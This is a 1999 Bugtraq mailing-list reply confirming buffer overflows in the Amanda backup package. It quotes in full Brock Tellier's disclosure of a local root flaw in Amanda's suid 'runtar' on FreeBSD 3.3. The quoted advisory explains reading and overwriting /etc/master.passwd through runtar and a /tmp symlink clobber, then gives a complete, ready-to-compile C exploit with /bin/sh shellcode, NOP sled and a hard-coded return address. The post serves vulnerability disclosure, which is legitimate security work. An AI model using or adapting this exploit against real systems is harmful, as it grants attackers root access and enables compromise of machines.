[12400] in bugtraq
Re: Amanda multiple vendor local root compromises
daemon@ATHENA.MIT.EDU (monti)
Mon Nov 1 23:52:37 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSF.3.96.991101174747.788C-100000@mournblade>
Date: Mon, 1 Nov 1999 17:54:44 -0600
Reply-To: monti <monti@USHOST.COM>
From: monti <monti@USHOST.COM>
X-To: "Tellier, Brock" <btellier@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <381BDE3E.D5466143@usa.net>
hi,
I confirmed a few exploitable buffer overflows in multiple suid's on an
earlier version of amanda on BSDI as well a while back. As I recollect
'runtar' was one of them.
I apologize that I cant provide anything more specific than this, but it
was some time ago and I misplace my notes on it. Your post spurred my
memory so I figured I'd mention it.
-eric
On Sat, 30 Oct 1999, Tellier, Brock wrote:
> Greetings,
>
> OVERVIEW:
> The Amanda backup package has a several vulnerabilities which
> will allow any user to gain root privs.
>
> BACKGROUND:
> My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost
> certainly not the only vulnerable OS. A search for "amanda-2 and not
> freebsd" on altavista yields preliminary, unconfirmed data that some of
> the vulnerable OS's (based on packages that are included on install
> CD's, anyone can install Amanda to make themselves vulnerable) may be:
> RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2 Confirmation on which
> OS's/tar's are vulnerable would be useful.
>
> DETAILS:
>
> Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls
> /usr/bin/tar and passes all args given to runtar to this program. Tar is
>
> thus run with root permissions and is vulnerable to all of the same
> attacks on suid programs that it would have if it were suid itself.
>
> Vuln #1 - run tar as root
>
> Since tar is run with root permissions, you are free to tar up any file
> you wish, including /etc/master.passwd. You may also untar any file you
>
> wish, to any location on the system, including /etc/master.passwd. This
>
> does not require any exploit kung-fu and may be done by supplying args
> to tar/runtar as if you were root.
>
> Vuln #1.1 - tar contains a buffer overflow
>
> Obtaining root via buffer overflow here is redundant, of course, but it
> illustrates the point that even if tar's capabilities weren't able to
> gain root
> privs, the buffer overflow would still allow you to do so. An overflow
> exists *IN TAR* which will allow any user to execute commands as root.
> Note that an overflow in tar isn't an immediate security flaw
> since it is never suid/sgid, but it goes to show that one should do
> security audits of all the programs one calls with user input. By
> passing
> a long string to runtar in the form "/usr/local/libexec/amanda/runtar
> cvf
> $400bytes:bah" we can execute our commands. FreeBSD exploit attached
> below.
>
> Vuln #2 - symlink problem
>
> Not quite as serious, but a concern nonetheless. When the amandad
> daemon
> is run, a bin-owned file called "amandad.debug" in /tmp. By creating
> a symlink from /tmp/amandad.debug to any other file, we will force
> amandad
> to clobber the contents with that of amandad's debug info. Note that
> amandad is not suid/sgid, but it is often run with root perms at startup
>
> or via scripts.
>
> WHO IS VULNERABLE:
> Anyone running a suid version of runtar should be suspicious. I've not
> tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0
> and 2.4.1 as "additional packages" on the install CD and tar-1.11.2.
>
>
> EXPLOIT:
>
> /*
> * Amanda runtar exploit yields euid=0(root)
> * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
> * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
> * platforms
> *
> * Compile gcc -o amandax amandax.c
> * Run ./amandax <offset> <buflen>
> * keep buflen around 400, try positive and negative offsets
> *
> * Brock Tellier btellier@usa.net
> */
>
>
> #include <stdlib.h>
> #include <stdio.h>
>
> char fbsdshell[]= /* mudge@lopht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>
>
> #define LEN 400
> #define NOP 0x90
> #define ALIGN 3
> #define OFFSET 0
> #define ADDR 0xbfbfdd90 /* fbsd 3.3 */
>
> int main(int argc, char *argv[]) {
>
> long int offset=OFFSET;
>
> int i;
> int buflen = LEN;
> long int addr = ADDR;
> char buf[LEN];
>
> if (argc > 1) offset = atoi(argv[1]);
> if (argc > 2) buflen = atoi(argv[2]);
> if (argc > 3) {
> fprintf(stderr, "Usage: %s <offset> <buflen>");
> exit(0);
> }
>
> fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
> fprintf(stderr, "Brock Tellier btellier@usa.net\n");
> fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n",
> addr+offset, buflen, offset);
>
> memset(buf,NOP,buflen);
> memcpy(buf+100,fbsdshell,strlen(fbsdshell));
> for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int
> *)&buf[i]=addr+offset;
>
> execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
> NULL);
>
> exit(0);
> }
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
>
